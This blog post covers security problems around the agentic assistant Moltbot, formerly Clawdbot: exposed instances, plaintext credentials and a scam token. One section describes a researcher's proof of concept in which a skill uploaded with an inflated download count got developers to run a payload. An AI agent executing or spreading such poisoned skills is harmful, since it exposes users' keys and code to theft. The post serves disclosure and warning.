Cautionary Tale

A Cautionary Tale from a Viral AI Assistant: Artificial Intelligence Trends

Here’s a viral, powerful, open-source personal AI assistant that’s serving as a cautionary tale – on several levels – for things that can go wrong.

The AI assistant is Moltbot, a popular agentic AI personal assistant formerly known as “Clawdbot”. Why did they change the name? You can probably guess: “Anthropic asked us to change our name,” the newly named Moltbot account wrote on X on Tuesday. “‘Molt’ fits perfectly – it’s what lobsters do to grow.”

When you start out by being forced to change your name, that’s not a good start. But that’s just the beginning.

Advertisement
CloudNine

Moltbot is an open-source, self-hosted AI personal assistant, which does things like:

  • Integrate popular messaging apps such as Telegram, WhatsApp, Discord, and Slack;
  • Perform complex tasks (via agentic AI) with minimal user intervention, such as managing calendars, responding to emails, screening phone calls, and booking table reservations;
  • Retain long-term memory, allowing it to provide more personalized assistance over time;
  • Utilizes a skills library called ClawdHub (which apparently hasn’t been rename – yet), where users can download additional functionalities to expand the bot’s capabilities;

It is designed to be a privacy-focused alternative to cloud-based AI tools by running locally on a user’s machine rather than on a remote server. To achieve this level of automation, Moltbot is designed to have deep system access, requiring credentials and access to encrypted messaging apps and personal files to function as a comprehensive personal assistant.

See where this is heading? Here are some of the components making up this cautionary tale for Moltbot:

The “Easy Install” Is a Security Trapdoor

Advertisement
Cimplifi

While ClawdBot was designed for accessibility, its ease of use masked a deep technical complexity. Security researchers, including Jamieson O’Reilly (founder of red-teaming company Dvuln) and the firm SlowMist, quickly found hundreds of ClawdBot instances exposed to the public internet. This exposure stemmed from user configuration errors rather than a hidden exploit in the software itself, highlighting a dangerous gap between the tool’s appeal and the expertise needed to run it safely.

As Eric Schwake, director of cybersecurity strategy at Salt Security, explained in this article, “A significant gap exists between the consumer enthusiasm for Clawdbot’s one-click appeal and the technical expertise needed to operate a secure agentic gateway.” This misconfiguration could leak API keys, private chat logs, and account credentials. Compounding the risk, security firm Hudson Rock found that the tool stores some user secrets in plaintext Markdown and JSON files, making them an easy target for common infostealer malware like Redline, Lumma, and Vidar if the host machine is compromised.

Its Greatest Strength Is Its Biggest Flaw

The central paradox of an agentic AI like ClawdBot is that its value comes from its greatest risk: deep system access. For the tool to be useful, it must read files, execute commands, and access credentials. This design fundamentally undermines decades of established cybersecurity principles. Wendi Whitmore, chief security intel officer at Palo Alto Networks, warned that such tools could represent “the new era of insider threats,” turning a trusted assistant into a prime target for hijacking.

O’Reilly articulated this fundamental conflict perfectly:

“The deeper issue is that we’ve spent 20 years building security boundaries into modern operating systems. Sandboxing, process isolation, permission models, firewalls, separating the user’s internal environment from the internet. All of that work was designed to limit blast radius and prevent remote access to local resources. AI agents tear all of that down by design. They need to read your files, access your credentials, execute commands, and interact with external services. The value proposition requires punching holes through every boundary we spent decades building.”

Even Its “Skills” Can Be Poisoned

O’Reilly also discussed a significant supply chain vulnerability in ClawdHub, the AI assistant’s skills library. In a proof-of-concept, he uploaded a benign skill, artificially inflated its download count to over 4,000, and confirmed that developers had downloaded the poisoned package. “The payload pinged my server to prove execution occurred, but I deliberately excluded hostnames, file contents, credentials, and everything else I could have taken,” he said.

This is exceptionally dangerous because ClawdHub’s own developer notes clarify that all code is treated as “trusted code,” with no moderation process currently in place. The entire burden of vetting code falls on the user. The potential for damage is immense. As O’Reilly noted, in the hands of a real attacker, “those developers would have had their SSH keys, AWS credentials, and entire codebases exfiltrated before they knew anything was wrong.”

Where There’s Hype, There Are Scammers

If that wasn’t bad enough, scammers were quick to exploit the popularity surrounding ClawdBot’s forced rebranding to Moltbot. During the name change, they hijacked old accounts and squatted on the project’s related GitHub and X handles, using the confusion to impersonate the project and promote a fake $CLAWD token on Solana. The scheme briefly worked, with the token reaching an early market capitalization of around $16 million.

The momentum was short-lived. The token’s market cap plunged from roughly $8 million to under $800,000 as soon as the project’s founder, Peter Steinberger, publicly denied any involvement. Steinberger, who is now working with GitHub to recover the affected accounts, has made it clear that he has no connection to any cryptocurrency, by stating:

“To all crypto folks: Please stop pinging me, stop harassing me. I will never do a coin. Any project that lists me as coin owner is a SCAM. No, I will not accept fees. You are actively damanging the project.”

A rocky start for Clawd, er, Moltbot provides a cautionary tale for the rest of us. Does Moltbot have a future as a useful AI assistant? We’ll see, but it certainly has to overcome a rough start to see that future.

Hat tip to my son Carter, who gave me the heads up on this story and shared the linked articles to boot!

So, what do you think? Do you have any other AI cautionary tale stories to add? Please share any comments you might have or if you’d like to know more about a particular topic.

Image created using Microsoft Designer, using the term “robot lawyer holding a robot lobster”. Written with AI assistance.

Disclaimer: The views represented herein are exclusively the views of the authors and speakers themselves, and do not necessarily represent the views held by my employer, my partners or my clients. eDiscovery Today is made available solely for educational purposes to provide general information about general eDiscovery principles and not to provide specific legal advice applicable to any particular circumstance. eDiscovery Today should not be used as a substitute for competent legal advice from a lawyer you have retained and who has agreed to represent you.


Discover more from eDiscovery Today by Doug Austin

Subscribe to get the latest posts sent to your email.

Leave a Reply